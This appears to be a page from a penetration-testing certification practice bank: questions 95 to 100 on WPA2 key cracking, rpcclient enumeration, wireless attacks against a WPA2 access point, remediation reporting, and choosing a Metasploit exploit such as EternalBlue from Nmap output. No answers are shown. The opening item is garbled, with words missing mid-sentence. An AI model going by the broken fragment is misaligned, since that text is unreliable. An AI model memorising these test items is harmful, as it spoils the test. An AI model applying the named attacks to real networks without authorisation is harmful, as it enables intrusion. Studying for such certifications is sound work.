The client is con ble monitoring mode using Aircrack-ng ch of the following hosts should the penetration tester select for additional manual testing?

Options:

A.

Server 1

B.

Server 2

C.

Server 3

D.

Server 4

Question 95

During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption. Which of the following attacks would accomplish this objective?

Options:

A.

ChopChop

B.

Replay

C.

Initialization vector

D.

KRACK

Question 96

A penetration tester establishes a remote session to a host and receives the following prompt: rpcclient . Which of the following is the tester most likely able to do?

Options:

A.

Query local users on the system.

B.

Obtain SAM database password hashes.

C.

Enumerate session tokens.

D.

Change the Resultant Set of Group Policy applied in AD.

Question 97

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

Options:

A.

Configuration changes were not reverted.

B.

A full backup restoration is required for the server.

C.

The penetration test was not completed on time.

D.

The penetration tester was locked out of the system.

Question 98

During wireless testing, a penetration tester observes the following customer APs and configurations:

SSID / Configuration

AP1 – WPA3

AP2 – WPA3

AP3 – WPA2

AP4 – WPA3

Which of the following attacks can the tester use only against AP3?

Options:

A.

Brute force

B.

Signal jamming

C.

Evil twin

D.

Deauthentication

Question 99

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

Options:

A.

Articulation of cause

B.

Articulation of impact

C.

Articulation of escalation

D.

Articulation of alignment

Question 100

A penetration tester completes a scan and sees the following Nmap output on a host:

Nmap scan report for victim (10.10.10.10)

Host is up (0.0001s latency)

PORT STATE SERVICE

161/udp open snmp

445/tcp open microsoft-ds

3389/tcp open ms-wbt-server

Running Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7::sp0

The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

Options:

A.

exploit/windows/smb/psexec

B.

exploit/windows/smb/ms08_067_netapi

C.

exploit/windows/smb/ms17_010_eternalblue

D.

auxiliary/scanner/snmp/snmp_login

Page: 1 / 34
Total 336 questions